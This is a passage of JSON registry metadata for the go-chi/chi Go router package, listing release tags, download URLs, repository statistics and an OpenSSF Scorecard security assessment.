1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.141Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":4.793834424600911,"dependent_packages_count":8.452778221382484,"stargazers_count":0.488011265946437,"forks_count":0.8836260087398193,"docker_downloads_count":null,"average":3.654562480167413},"purl":"pkg:golang/github.com/go-chi/chi/v3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/v3","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/v3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/v3/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv3/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3605038,"name":"gopkg.in/go-chi/chi.v3","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in/go-chi","versions_count":15,"first_release_published_at":"2017-06-21T19:28:24.000Z","latest_release_published_at":"2023-09-07T09:46:43.000Z","latest_release_number":"v3.3.5","last_synced_at":"2026-08-12T02:06:15.747Z","created_at":"2022-04-11T06:37:18.036Z","updated_at":"2026-08-12T02:06:15.748Z","registry_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v3","install_command":"go get gopkg.in/go-chi/chi.v3","documentation_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v3#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"p